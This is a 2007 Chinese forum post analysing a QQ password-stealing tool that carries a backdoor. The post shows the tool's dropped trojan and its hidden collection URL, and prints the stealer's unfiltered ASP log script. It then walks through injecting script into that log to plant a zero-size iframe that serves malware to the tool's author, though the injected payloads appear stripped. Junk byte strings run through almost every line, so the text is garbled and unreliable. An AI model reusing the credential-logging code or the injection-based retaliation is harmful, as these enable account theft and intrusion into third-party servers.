snowfox373 2007-11-28 13:26
找出安全漏洞 QQ盗号软件后门分析与反击
今天无聊给一朋友讲解[b]QQ盗取[/b]原理,从网上找了一个工具 “[b]明小子QQ密码特工[/b]”结果发现这个软件有后门。下面就让我带着大家来分析一下。
�R)@8g&Q
?�p�x
首先我们用nod32来查一下有没有毒。图1
�d"~�Q
t+H
[img]http://soft.yesky.com/imagelist/2007/331/te53w81g8i63.jpg[/img]&y�?/h�~�I�c!S-\�x!a/W
看到了吧没有病毒。我们把监控打开在运行看看图2
5e/o�`�\�L�p
t�z�d2D!x
[img]http://soft.yesky.com/imagelist/2007/331/g772e3q90wig.jpg[/img]
�`�T0n
J�\ Y3V�e
看到了吧 NOD32检测到了病毒。为了确认一下。我再用‘木马辅助查找器’的文件监视功能来检测下。图3
#M5q8V�L%w&{�W�F(f�Q�[
[img]http://soft.yesky.com/imagelist/2007/331/1cm3k212s6o3.jpg[/img]
+A!Y1Z�w*@�t�~�|8U�|�R
新建 C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\123.exe �i3x�N6O2u \.X
很明显软件本身在运行的同时释放了一个123.exe 而NOD32查杀到的也就是这个文件。
'b.|#p�L'w/v(\
C:\Documents and Settings\Administrator\Local Settings\Temp\IXP003.TMP\ �Z�}/_$d-I7v.M5h�J
接着我们用peid查下123.exe. 图4
�L7c�c�s'S�f1P
[img]http://soft.yesky.com/imagelist/2007/331/ubofl0v2l006.jpg[/img]
;p1@'m�c9}�i�S�}�V
EP段.nsp1经常搞免杀的应该知道这是北斗加的壳,我们再看看区段vmp 图5
;E%Y�m�{�k-R
[img]http://soft.yesky.com/imagelist/2007/331/5o6rexmjh0cn.jpg[/img]
/p�{�\�q7C�w�j:U�C!N
这个一看就是用vmprotect做的免杀。至于123.exe是什么木马咱门就不继续分析了。
�Q�S�L @�i7d/U)r�r
接下来分析他生成后的文件是不是一样令人担忧。)^0M2E1K;]�\�F
随便配置一个图6�r�N4o%N8{8i�V�D
[img]http://soft.yesky.com/imagelist/2007/331/qp0jcacn705d.jpg[/img]�w�b-l&e�k�T
Ollydbg手工给他脱壳esp定律简单 图7�I�y�c�W�`�i�q
[img]http://soft.yesky.com/imagelist/2007/331/h5u09ox4c5vr.jpg[/img]
�[�}�B�n�Q�W/p6i5k Z
脱壳成功后我们在用PEID检测下 图8
�U�W2X
v.p
[img]http://soft.yesky.com/imagelist/2007/331/d117n951c84m.jpg[/img]
6v�O!d+I�{$A
我们再用c32asm对他进行反汇编,搜索asp图9 2u�N.I7\4?�E�l�r
[img]http://soft.yesky.com/imagelist/2007/331/66l0rc5g61na.jpg[/img]/x2m�z�p
i!U(D5C�u
看到了什么 .刚才我是默认设置的应该是[url]http://k.thec.cn/xieming/69q/qq.asp[/url]才对。,怎么会是[url]http://langyeqq.cn/qq/newbacka.asp[/url] 这个呢!我们浏览看看 图10
�m4K:@�o)_4Q
[img]http://soft.yesky.com/imagelist/2007/331/7t6ixsnijq0k.jpg[/img]
d @&s�? o
"pzQQ"看到了吧,说明就是他的盗号的,从这些可以确定,这个软件不但运行的时候施放一个木马,而且就连我们配置好的文件也被他留了后门,而作者就坐等着收号了。�R
^(@�I�[�U/c
U6z-Y
后门反击战 作者:fhod�h9k
G5h-G�G�t�`
看到这..想必大家也和我一样非常气愤..难道我们就任由作者下去吗.当然不..现在我们就开始反击.3g2o�j�N�p�G(d�W$J
我们来看看qq.asp的代码9x�^5]�F�I�F�x"J�g4r�A�~
首先来看�o�[�z�~ R�~6Q
strLogFile="Q7.txt"
�R
P�q;[�P;L
w
这个是QQ接受文件..默认的是q7.txt
)P�j,k,V�Z�J
继续看代码
�O-x�N�a;d�a�k�o2u
QQNumber=request("QQNumber")0l1`6y)R"V�r�d�G
QQPassWord=request("QQPassWord")�]�?+?�c�x&U)|-o
QQclub=request("QQclub")�@"j9?1e�^�h!p-f�D W
QQip=request("QQip");v5`+m�e�C
t4S
是没经过任何过滤的..这些参数的数据我们完全可以自定义
�j�l�b�Z.q(W/}4X�i�V
在往下看1k6D�t�L�@�Y2e
if QQNumber="" or QQPassWord="" then;S�p�j9~'x�W!c
response.write "pzQQ"
7c�k�p2V&i B4g�I
response.end
�s7F,Q�t/P�a�n
假如QQNumber和QQPassWord的值为空就返回pzQQ .然后程序结束工作.. 只要这两个值不为空就继续执行下面的代码
;V X
P7q�O(v5o�_/O.S
StrLogText =StrLogText&QQNumber&"----"&QQPassWord&"----会员:"& QQclub&"----IP:"&QQip&"("&request.servervariables("REMOTE_HOST")*@0@2t'r-C.W
s�{9H2n�I
StrLogText=StrLogText&")"
snowfox373 2007-11-28 13:27
写入q7.txt文件 /C�W�f
W Q�m
格式为 QQ号码----QQ密码----会员:----IP:
$g,J�G _�h
x�g
继续看下面的代码-u�s4m�Q7F.{�N M
set f=Server.CreateObject("scripting.filesystemobject") (没有q7.txt这个文件就自动新建),j�S�M4q*{(H(\�c
set ff=f.opentextfile(server.mappath(".")&"\"&strLogFile,8,true,0)
0W)h�m�R�P N8^%\:u
ff.writeline(StrLogText) (打开q7.txt并写入数据)�f�G,R�r"x&B
|
最后response.write "发送成功!" 满足条件提示成功.�`5w d�c,k5\/f
所有的代码也就是这些..程序并未做任何过滤..和处理..也就是说..只要满足qq.asp?QQNumber=123&QQPassWord=123 就回返回 "发送成功!"的提示.
�M)w�I#Z$L�f�C�J
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=123[/url]图11
.~�z�q�P�I�s
C�g'R
[img]http://soft.yesky.com/imagelist/2007/331/34m025388abm.jpg[/img]
'Q,C5r7|5~-A
这就证明了QQNumber=123&QQPassWord=123这两个我们是可以自己定义的..如果我们写入的不是数字..而且一段脚本代码呢?会不会执行呢..让我们来试下
�`�N5s�p�f;b/r
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]
;B.b�a&N�G9F�k�\
D�o�}
图125c�S�o:C
C�e
[img]http://soft.yesky.com/imagelist/2007/331/9eftgaxwb5w2.jpg[/img]
�k9T�p�y�W
插入代码成功...我们来看下
�d�k�@
G)F�w E(Q
[url]http://www.ciker.org/soft/q7.txt[/url]的源文件又是什么样的..
*z,s#[�y�G�p0w
图13
,|-o�Z�K
U-J�u�u,J
[img]http://soft.yesky.com/imagelist/2007/331/k0f03a2zd6e5.jpg[/img]�G�g%w-n6H�m�P�M�p/v8R
再次证明对提交的数据是无任何限制的...我们完全可以自己发挥想象.插入任何代码都可以...:e K�\�R,|�t,w�x9C
如果想反挂马的话..我们就可以提交以下数据�k�j�_ d�S�i
以下是引用片段:
�U"[�c-@�q(M2@�P
[url]http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=[/url]$r2U�q'b�S(d.X;n
图14�L)o2W�[�A"f$X�x�d
[img]http://soft.yesky.com/imagelist/2007/331/g8gh9846k5ha.jpg[/img]�W*k I�D){
当然我这里把width和height设置为480只是为了方便演示..实际挂马中要改为0+S�|$f�_,x�q
好了..现在我们就可以给作者一个惊喜去了..图15
)b5k9A&e8`�L
[img]http://soft.yesky.com/imagelist/2007/331/7h4s370y51l5.jpg[/img]